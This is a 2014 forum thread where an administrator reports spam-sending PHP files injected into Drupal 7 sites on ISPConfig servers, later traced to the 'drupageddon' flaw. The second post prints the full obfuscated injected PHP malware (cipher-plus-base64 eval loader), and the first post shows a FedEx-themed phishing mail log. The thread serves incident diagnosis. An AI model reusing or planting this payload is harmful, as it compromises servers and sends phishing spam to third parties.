php file injection in webfolders

Discussion in 'ISPConfig 3 Priority Support' started by arraken, Oct 22, 2014.

  1. arraken

    arraken Member

    Hi!

    I'm not sure if the following problem is directly related to ISPConfig, but maybe someone here knows:

    Last night, 2 of our webservers started sending a lot of spam, originating from php-files which were apparently injected into the web folder of several clients.

    I was able to stop the problem by just deleting the offending files, but I am quite worried how this could happen.

    All the sites were Drupal 7 Sites. One webserver runs apache2, the other one nginx. ISPconfig 3.0.5.3 is running on both servers.

    The php-files were located in seemingly random folders in the drupal installation. For example in /web/sites/all/modules/contrib/panels/plugins/page_wizards/alias.php.

    The php maillog states the following:
    Code:
    [22-Oct-2014 07:30:51 UTC] mail() on [/var/www/clients/client11/web22/web/sites/all/modules/contrib/panels/plugins/page_wizards/alias.php(235) : 
    eval()'d code:173]: To: [email protected] -- Headers: From: "FedEx Standard Overnight" 
    <[email protected]> X-Mailer: EircomNetCRCWebmail(http://www.eircom.net/) 
    Reply-To: "FedEx Standard Overnight" <[email protected]> Mime-Version: 1.0 Content-Type: multipart/alternative;boundary=
    "----------141396305154475D2B66A00"
    
    Does anyone have some pointers how this could have happened, or what can be done to prevent such behaviour.
     
    Last edited: Oct 22, 2014
  2. arraken

    arraken Member

    Here is the content of one of the injected php-files which were sending the spam:

    Code:
    <?php
    $vNOQ1WP = Array('1'=>'j', '0'=>'Z', '3'=>'e', '2'=>'4', '5'=>'H', '4'=>'I', '7'=>'1', '6'=>'A', '9'=>'F', '8'=>'U', 'A'=>'t', 'C'=>'V', 'B'=>'W', 'E'=>'P', 'D'=>'8', 'G'=>'h', 'F'=>'0', 'I'=>'D', 'H'=>'u', 'K'=>'3', 'J'=>'5', 'M'=>'l', 'L'=>'R', 'O'=>'f', 'N'=>'n', 'Q'=>'M', 'P'=>'k', 'S'=>'y', 'R'=>'a', 'U'=>'2', 'T'=>'c', 'W'=>'Q', 'V'=>'p', 'Y'=>'z', 'X'=>'N', 'Z'=>'i', 'a'=>'K', 'c'=>'x', 'b'=>'o', 'e'=>'C', 'd'=>'w', 'g'=>'q', 'f'=>'s', 'i'=>'E', 'h'=>'Y', 'k'=>'L', 'j'=>'r', 'm'=>'7', 'l'=>'B', 'o'=>'G', 'n'=>'6', 'q'=>'v', 'p'=>'d', 's'=>'9', 'r'=>'m', 'u'=>'g', 't'=>'X', 'w'=>'b', 'v'=>'T', 'y'=>'O', 'x'=>'S', 'z'=>'J');
    function v3NUZSL($v0NE16N, $v7WRNK7){$vP4KBXC = ''; for($i=0; $i < strlen($v0NE16N); $i++){$vP4KBXC .= isset($v7WRNK7[$v0NE16N[$i]]) ? $v7WRNK7[$v0NE16N[$i]] : $v0NE16N[$i];}
    return base64_decode($vP4KBXC);}
    $vYDCSXA = 'erMraoMYTUCFaeLO8isvC9fZhUsP0xzpax6rzZlVTKXMpeuPt7lE87Lw4rX7TKLqwCs'.
    'GhKLVwU2ZtxPuzZhuRtXO0Usq09sVTeuPt7X98M098MfN8PCXv7L9tF9i'.
    'L94NtxPVeNfaeBCUhBdbhr9Y0vhFtULMhUsP0xuPt7lE87Lw4rXq'.
    '0o8ZtxPVydbz0tGVpeuVydVseuVV0Z6bRtXY0tWbz9sWv7X8BSzF3tlM4MFV4ehr4eLO8isvC9fZp5Md0xzpEvF'.
    'ZQx4VeNfaetLJTo8ctKXMwrWbavfaeBC2RtWbavfaOWVMw5XMRBhuaoMYTUCFaeLO8isvC9fZp5Md0xzpax6rzZ'.
    '6Pt7lE87Lw4NLJTo8ZtvFs414ZaWVmeuVserCfTUCV0Z6bRtXY0tWbz9s'.
    'Wv7X8BSzF3tlM4MFVaWVmeuMMhUGq4eLO8isvC9fZp5Md0xzpydbz0tGVpeu'.
    'VydVseuVMTNzqTMDFQIWbavfaer07wrXFRBsH4oMYtUpqwULORt6bzoMdaWVmeuPP0Usq05QuExllTNzG3xuZXZ'.
    '2cyI8HQ1QJkZ4f4e42k1iYye2cQvuH4ZPmeuPaeB0qTrCGhUuuaeLNw'.
    'UsPTSlGTS6P0Usq0ePaetfaeWMV0Z6bTKLSTKLSaeLVTeduzopqwUWV4eis4i0lv9X9aWbzetfaeWPzTrCFptzH49LxC'.
    '88meuPzOWbzOWbzeuMS0tL7Tr2uLP9Q8F8meNFaer07wrXFRBsH45LJTo8ctKXMwrWbaWVmeuMV0ZuGRtXY0tWbz9sWv7X8'.
    'BSzMwB9Vw5QZtxPaeWPzv74u4BMYTUCFaeLO8isvC9fZpoGMwBCY4MFVeuPze8sx4e9VTKXMpeuPt7lE87Lw4r7'.
    'MTKXG0UCY4MFVeuPze8sx4e9VTKXMpeuPt7lE87Lw4r0SwU7Y4MFVeuPze8sx4e9VTKXMpeu'.
    'Pt7lE87Lw4r7GRBcMTNQZtxPaexPaetfaeWMM3oMFaePmeuMseubzRBhb0UCFtU7G0UM1tK9'.
    '7wKLMT7sNToQbaxPaetfaeWMrwKzMhBXbaeLO8isvCelGTS6PRUCJ4IF+4eLdwKXFaWbzetfaeWPzz9sWv7X8BSLj0tMp4IFuT'.
    'KLSRtl1TUcGTUGMTSuPTosYpePmeuPzOWbzOWbaexLMwB9Vw5QuExl6pBJY0tzVhBcV3r8bhr9Y0vhF'.
    'tULMhUsP0xuPt7lE87Lw4rCAhBMfTSzpaxPmeuPPpoGMwBCY4IFuW5CH'.
    'TUCSRB9fRtVMaozGTU8UX9sP0BXq0o8bz9sWv7X8BSzFRoCA0tQZtxPVydbzzo7MTKXG0UCY4IFu'.
    'W5CHTUCSRB9fRtVMaozGTU8UX9sP0BXq0o8bz9sWv7X8BSzA0tXYhBpMTSzpaxPmeuPP0NzqwtQuExl6'.
    'pBJY0tzVhBcV3r8bhr9Y0vhFtULMhUsP0xuPt7lE87Lw4r0SwU7Y4MFVavfaexLAhBMf0t'.
    'zY4IFuW5CHTUCSRB9fRtVMaozGTU8UX9sP0BXq0o8bz9sWv7X8BSzA'.
    'hBMf0tzY4MFVavfaexLGwoMGTUCY4IFuW5CHTUCSRB9fRtVMaozGTU8UX9sP'.
    '0BXq0o8bz9sWv7X8BSzGwoMGTUCY4MFVavfaexLdhtXY0tQuExl6pBJY0tzVhBcV3r8bhr9Y0vhFtULMhUsP0xuP'.
    't7lE87Lw4NlGTKXMTSzpaxPmeubzRBhbRtXY0tWbz9svLCzBLC4VaWbz3dbzexLO8FCxCPCxBSpWx9lO8FCQL'.
    'Zpp4IFu4ZDZyS6aeWPPt7X98M098MfN8PCXv7L9tF9iL94Ntx6s4e4cQ1THQe2dk1iZydbzeBMrae9MwtlF3'.
    'xuPt7X98M098MfNx9L889shtF0E8Mpl8PL9L9sov74NtxPVeuPz3dbzeWPPt7X98M098MfNx9L889shtF0E8Mpl8'.
    'PL9L9sov74Ntx6s4e4cQ1THQe2dk1iZydbzetFaetFaeuMV0ZGVTKXMpeuPtF0'.
    'zviCvaxPaetfaeWMrwKzMhBXbaeLOLPMQLCQuhtQuzoAM3x6sEZ6P0rMf0xPaeWMme'.
    'uPzexLrRBcMwr9A0x6s4o9fpoCStU7GhKzqTSuPhBcVhtXMT7fPRUCJtxPmeuPzexLrRBcMwr9A0x6s4oJ7'.
    'wCsAhBXSwKQbzo0VwoCHhB7MavfaeWPzzo0VwoCHhB7M4IFupoC2p9sAhBXSwKQb'.
    'zo0VwoCHhB7MavfaeWPzzo0VwoCHhB7M4IFu3oJ7wCsAhBXSwKQbzo0VwoCHhB7MavfaeWPzz9sox8c987fPRUC'.
    'JtCfZwr9A0xzp4IFuzo0VwoCHhB7MydbzetFaetFaeuMV0ZGMwtlF3xuP0B7GRBcYaxPaetfaeWMM3o'.
    'MFaePmeuMseubz0rsS0B91Re6bzoCAhBMfTSlGTS6P0NLMRBduEv2uzoCAhBMfaWbz3dbzexLFRoCA0x6s4eL'.
    'FRoCA0tXwhtzShtMOTr9H0euPpoGMwBCYaCFmeuPzz5Lb0B7M4IFuhBcF0tzOwB91TrsYaeLFRoCA'.
    '0CfZpoGMwB8ZtxPmeuPzz5Lb0B7M4IFuwNCAtU7GhKzqTSuPpoGMwB8VydbzexLFRoCA0x'.
    '6s45LM35LOwB91TrsYaeLFRoCA0xPmeuPzz5Lb0B7M4IFu3oJ7wCsAhBXSwKQbz5Lb0B7MavfaeuPzzo7MTKXG0U'.
    '8uEx6PwBCYTU9N0tXwhtzShtMOTr9H0euPwBCYTU9N0tQVtvfaeWPPwBCYTU9N0x6s4o9fpoCStU7GhKzqTSuPwBCYTU9N0'.
    'CfZwBCYTU9N0xzpavfaeWPPwBCYTU9N0x6s4oJ7wCsAhBXSwKQbzo7MTKXG0U8Vyd'.
    'bzexLA0tXYhBpM4IFupoC2p9sAhBXSwKQbzo7MTKXG0U8VydbzexLA0tXYhBpM4IFu3oJ7wCsAhBXSwKQbzo7MTKXG0U8Vydbz'.
    HhSuPTo9ShB7Yavfa4e6u4e6u4e6u4e6u4e6u4e6'.
    'u4elseZ6u4e6u4e6u4e6u4e6u4elseZ6u4e6u4e6u4e6u4e6u4el'.
    'V0Zuuz5lGTr9AT7fNTrCFptzHz7FsExpb0B9P0tzYzS6V45zMp5CSwZ6PRoCG0oCST'.
    'Yfa4e6u4e6u4e6u4e6uOWbu4e6u4e6u45Fa4e6u4e6u4e6a4e6u4e6u4'.
    'el60rXfwKXMaeLrTePmeZ6u4elseZ6u4elMw5XM45zMp5CSwZloW8cvLvfqa'.
    'Z6P0tzSTKLSkZLMTNzHwYfuaZDa4e6u46bu4e6uRBhb4eLdhtzGwtXwzKzMp5CSwZppEvFNh'.
    'tzShtPN4ePuz5zMTS6s4o9STr9Jaepb0B9P0tzYzYF+zoGMhBLMTNQf4ep1wUJF0BJFzYF+z5zMTSPmeZ6u4e6a4e6u'.
    '45zMp5CSwZ6PTrCYydVs';
    eval(v3NUZSL($vYDCSXA, $vNOQ1WP));?>
     
  3. till

    till Super Moderator Staff Member ISPConfig Developer

    Your drupal has been hacked, so thats not related to ispconfig. Ensure that you always install all frupal updates regularily. There was a major flaw in drupal 7 a few days ago.
     
  4. arraken

    arraken Member

    Hi Till,

    you were exactly right. It was because of the recent drupageddon hack. Some of our sites were affected by it. The files were placed in the filesystem via drupals menu_router system using a file_put_contents callback. So it really isn't a server/ISPConfig specific security problem, but purely a Drupal problem.
     

Share This Page